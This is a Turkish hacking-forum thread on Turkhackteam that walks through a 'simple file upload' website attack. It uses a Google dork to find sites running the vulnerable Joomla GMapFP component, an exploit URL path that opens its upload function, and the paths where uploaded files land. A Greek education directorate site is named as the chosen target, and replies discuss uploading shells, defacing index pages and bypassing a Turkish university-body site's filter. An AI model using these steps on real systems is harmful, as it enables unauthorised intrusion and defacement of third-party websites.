Web Site Hackleme | Basit File Upluoad

GECEYARASA

Üye
4 Eyl 2022
144
89
Ottoman
Merhaba Değerli Türk Hack Team üyeleri Ben GECEYARASA, Basit File Upluoad Konusunu Anlatıcam
Basit Site Hackleme #1

ilk olarak bir exploit buluyoruz mesela;



Google Dorkumuzu Exploit tarayıcımızda aratıyoruz

inurl:''com_gmapfp''



* Ülke Domain Uzantıları yazabilirsiniz ve sadece o ülkeye ait siteler karşınıza çıkar.

" Örnek site:gr site:.br "

" inurl:''com_gmapfp''site:gr "



SİTEYİ SEÇTİM




Bu Kısmı Silin

Linkimizin " index.php?option=com_gmapfp&view=gmapfplist&Itemid=247 " bu kısmını siliyoruz.

Exploitimizi çalıştırıyoruz.
Şimdi payloadı yapıştırıcaz.


" index.php?option=com_gmapfp&controller=editlieux&tmpl=component&task=edit_upload "

" ΔΙΕΥΘΥΝΣΗ ΔΕΥΤΕΡΟΒΑΘΜΙΑΣ ΕΚΠΑΙΔΕΥΣΗΣ Β' ΑΘΗΝΑΣ " Linkimizin sonuna yapıştırıyoruz.


Böyle olucak şekilde ayarlayalım




Dosya seç diyoruz resmimi atıyoruz

Upluod the picture dedikten sonra hata alıcaz bu doğru yaptığımızı gösterir.



index.php kısmını ve sonrasını silip alttaki linkleri yapıştırıp " dosyaismi " kısmına yüklediğiniz resmin ismini " jpg " kısmına uzantısını yazıyoruz.

images/stories/gmapfp/dosyaismi.jpg

images/stories/gmapfp/dosyaismi.jpg
images/gmapfp/dosyaismi.jpg

images/gmapfp/dosyaismi.jpg


 

GökBörü.

Uzman üye
20 Haz 2021
1,815
1,049
Kara Harp Okulu
Merhaba Değerli Türk Hack Team üyeleri Ben GECEYARASA, Basit File Upluoad Konusunu Anlatıcam
Basit Site Hackleme #1

ilk olarak bir exploit buluyoruz mesela;



Google Dorkumuzu Exploit tarayıcımızda aratıyoruz

inurl:''com_gmapfp''



* Ülke Domain Uzantıları yazabilirsiniz ve sadece o ülkeye ait siteler karşınıza çıkar.

" Örnek site:gr site:.br "

" inurl:''com_gmapfp''site:gr "



SİTEYİ SEÇTİM




Bu Kısmı Silin

Linkimizin " index.php?option=com_gmapfp&view=gmapfplist&Itemid=247 " bu kısmını siliyoruz.

Exploitimizi çalıştırıyoruz.
Şimdi payloadı yapıştırıcaz.


" index.php?option=com_gmapfp&controller=editlieux&tmpl=component&task=edit_upload "

" ΔΙΕΥΘΥΝΣΗ ΔΕΥΤΕΡΟΒΑΘΜΙΑΣ ΕΚΠΑΙΔΕΥΣΗΣ Β' ΑΘΗΝΑΣ " Linkimizin sonuna yapıştırıyoruz.


Böyle olucak şekilde ayarlayalım




Dosya seç diyoruz resmimi atıyoruz

Upluod the picture dedikten sonra hata alıcaz bu doğru yaptığımızı gösterir.



index.php kısmını ve sonrasını silip alttaki linkleri yapıştırıp " dosyaismi " kısmına yüklediğiniz resmin ismini " jpg " kısmına uzantısını yazıyoruz.

images/stories/gmapfp/dosyaismi.jpg

images/stories/gmapfp/dosyaismi.jpg
images/gmapfp/dosyaismi.jpg

images/gmapfp/dosyaismi.jpg


yapılabilir fakat gövde açık olsa bile bu siteler kabul edilmez : Dünyaca ünlü markalar ve yüksek önem taşıyan devlet/kurum siteleri dışında Upload açığı , Reflected XSS gibi zararsız açıklar ile alınan zoneler değerlendirmeye alınmayacaktır.
 

icehead

Uzman üye
19 Şub 2022
1,137
833
yapılabilir fakat gövde açık olsa bile bu siteler kabul edilmez : Dünyaca ünlü markalar ve yüksek önem taşıyan devlet/kurum siteleri dışında Upload açığı , Reflected XSS gibi zararsız açıklar ile alınan zoneler değerlendirmeye alınmayacaktır.
basit upload açığı diyorsunuz da bu basit dediğin açık baş yarar.
YÖK'e bağlı bir site de aynı açığı yakaladım kendi shell dosyamı attım o filtre geçilebilir.
(mail atıp durumu bildirmiştim.)
 

JohnWick51

Uzman üye
20 Mar 2022
1,867
770
28
Merhaba Değerli Türk Hack Team üyeleri Ben GECEYARASA, Basit File Upluoad Konusunu Anlatıcam
Basit Site Hackleme #1

ilk olarak bir exploit buluyoruz mesela;



Google Dorkumuzu Exploit tarayıcımızda aratıyoruz

inurl:''com_gmapfp''



* Ülke Domain Uzantıları yazabilirsiniz ve sadece o ülkeye ait siteler karşınıza çıkar.

" Örnek site:gr site:.br "

" inurl:''com_gmapfp''site:gr "



SİTEYİ SEÇTİM




Bu Kısmı Silin

Linkimizin " index.php?option=com_gmapfp&view=gmapfplist&Itemid=247 " bu kısmını siliyoruz.

Exploitimizi çalıştırıyoruz.
Şimdi payloadı yapıştırıcaz.


" index.php?option=com_gmapfp&controller=editlieux&tmpl=component&task=edit_upload "

" ΔΙΕΥΘΥΝΣΗ ΔΕΥΤΕΡΟΒΑΘΜΙΑΣ ΕΚΠΑΙΔΕΥΣΗΣ Β' ΑΘΗΝΑΣ " Linkimizin sonuna yapıştırıyoruz.


Böyle olucak şekilde ayarlayalım




Dosya seç diyoruz resmimi atıyoruz

Upluod the picture dedikten sonra hata alıcaz bu doğru yaptığımızı gösterir.



index.php kısmını ve sonrasını silip alttaki linkleri yapıştırıp " dosyaismi " kısmına yüklediğiniz resmin ismini " jpg " kısmına uzantısını yazıyoruz.

images/stories/gmapfp/dosyaismi.jpg

images/stories/gmapfp/dosyaismi.jpg
images/gmapfp/dosyaismi.jpg

images/gmapfp/dosyaismi.jpg


Ellerine saglik
 

GECEYARASA

Üye
4 Eyl 2022
144
89
Ottoman
Bu açıkla shell yüklemesi yapmayı denedin mi dostum?
derslerimde olması lazım konu uzun olmaması için eklemedim #2 eklerim onuda

hocam index çakaydık.
hocam url konusunda yanılma olmasın diye en basit yöntemiyle anlattım isteyen index de çakar

teşekkürler

yapılabilir fakat gövde açık olsa bile bu siteler kabul edilmez : Dünyaca ünlü markalar ve yüksek önem taşıyan devlet/kurum siteleri dışında Upload açığı , Reflected XSS gibi zararsız açıklar ile alınan zoneler değerlendirmeye alınmayacaktır.
merakı olup en baştan başlamak isteyenler için iyi bir giriş onun harici ummadık yerden neler çıkar hocam ama dediğiniz gibi kayda değer değiller tabi ki

Eline saglık dostum
teşekkürler

teşekkürler

Eline sağlık başarılar ☺️
teşekkür ederim hocam
 

THE_V

Yeni üye
15 Eyl 2022
19
13
Merhaba Değerli Türk Hack Team üyeleri Ben GECEYARASA, Basit File Upluoad Konusunu Anlatıcam
Basit Site Hackleme #1

ilk olarak bir exploit buluyoruz mesela;



Google Dorkumuzu Exploit tarayıcımızda aratıyoruz

inurl:''com_gmapfp''



* Ülke Domain Uzantıları yazabilirsiniz ve sadece o ülkeye ait siteler karşınıza çıkar.

" Örnek site:gr site:.br "

" inurl:''com_gmapfp''site:gr "



SİTEYİ SEÇTİM




Bu Kısmı Silin

Linkimizin " index.php?option=com_gmapfp&view=gmapfplist&Itemid=247 " bu kısmını siliyoruz.

Exploitimizi çalıştırıyoruz.
Şimdi payloadı yapıştırıcaz.


" index.php?option=com_gmapfp&controller=editlieux&tmpl=component&task=edit_upload "

" ΔΙΕΥΘΥΝΣΗ ΔΕΥΤΕΡΟΒΑΘΜΙΑΣ ΕΚΠΑΙΔΕΥΣΗΣ Β' ΑΘΗΝΑΣ " Linkimizin sonuna yapıştırıyoruz.


Böyle olucak şekilde ayarlayalım




Dosya seç diyoruz resmimi atıyoruz

Upluod the picture dedikten sonra hata alıcaz bu doğru yaptığımızı gösterir.



index.php kısmını ve sonrasını silip alttaki linkleri yapıştırıp " dosyaismi " kısmına yüklediğiniz resmin ismini " jpg " kısmına uzantısını yazıyoruz.

images/stories/gmapfp/dosyaismi.jpg

images/stories/gmapfp/dosyaismi.jpg
images/gmapfp/dosyaismi.jpg

images/gmapfp/dosyaismi.jpg


Eline sağlık ben bunu bir deniyeyim
 

GökBörü.

Uzman üye
20 Haz 2021
1,815
1,049
Kara Harp Okulu
merakı olup en baştan başlamak isteyenler için iyi bir giriş onun harici ummadık yerden neler çıkar hocam ama dediğiniz gibi kayda değer değiller tabi ki
Heh sonunda anlayan birisi çıktı ben dedimki orda sadece gövde açık olsaydı kabul edilmezdi yoksa tabi ummadık taş baş yarar nerelerden nasıl configler çıktı

Eline sağlık
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.